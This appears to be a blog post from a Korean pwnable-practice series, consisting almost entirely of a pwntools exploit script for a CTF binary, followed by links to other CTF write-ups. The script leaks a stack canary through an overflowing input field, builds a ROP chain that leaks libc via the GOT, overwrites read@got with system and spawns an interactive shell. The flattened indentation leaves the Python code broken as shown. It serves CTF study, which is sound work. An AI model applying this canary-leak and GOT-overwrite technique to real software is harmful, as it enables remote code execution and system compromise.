from pwn import *
p = process("./vuln")
e = ELF("./vuln")
l = e.libc
print p.recvuntil("\n")
p.sendline("youngsin")
for i in range(1,100):
print p.sendlineafter("\tselect\t|\t\n","1")
print p.sendlineafter("music\t|\t","A")
print p.sendlineafter("\tartist\t|\t","B")
for i in range(99,101):
print p.sendlineafter("\tselect\t|\t\n","3")
print p.sendlineafter("select number\t|\t\n",str(i))
print p.sendlineafter("music\t|\t","A"*19)
if i==100:
print p.sendafter("artist\t|\t","F"*16+"12345")
else:
print p.sendlineafter("artist\t|\t","B"*24)
print p.sendlineafter("\tselect\t|\t\n","2")
print p.recvuntil("12345")
canary = "\x00"+p.recv(3)
pppr = 0x080495ad
binsh = "/bin/sh\x00"
payload = "A"*20
payload += canary
payload += "A"*12
payload += p32(e.plt['write'])
payload += p32(pppr)
payload += p32(1)
payload += p32(e.got['read'])
payload += p32(4)
payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.bss())
payload += p32(len(binsh))
payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.got['read'])
payload += p32(4)
payload += p32(e.plt['read'])
payload += "A"*4
payload += p32(e.bss())
print p.sendlineafter("\tselect\t|\t\n","3")
print p.sendlineafter("select number\t|\t\n","100")
print p.sendlineafter("music\t|\t","A"*19)
print p.sendafter("artist\t|\t",payload)
print p.sendlineafter("\tselect\t|\t\n","4")
print p.recvuntil("BYE\n\n")
read_addr = u32(p.recv(4).ljust(4,"\x00"))
libc_base = read_addr - l.symbols['read']
system_addr = libc_base + l.symbols['system']
p.send(binsh)
p.sendline(p32(system_addr))
p.interactive()
'System > Pwnable Practice' 카테고리의 다른 글
| Hitcon CTF 2017 start (0) | 2019.07.30 |
|---|---|
| Codegate 2019 CTF aeiou (0) | 2019.07.30 |
| Defcon CTF 2016 Feed me (0) | 2019.07.29 |
| SECCON CTF 2018 Classic (0) | 2019.07.28 |
| Defcon CTF 2015 r0pbaby (0) | 2019.07.28 |
JeonYoungSin
메모 기록용 공간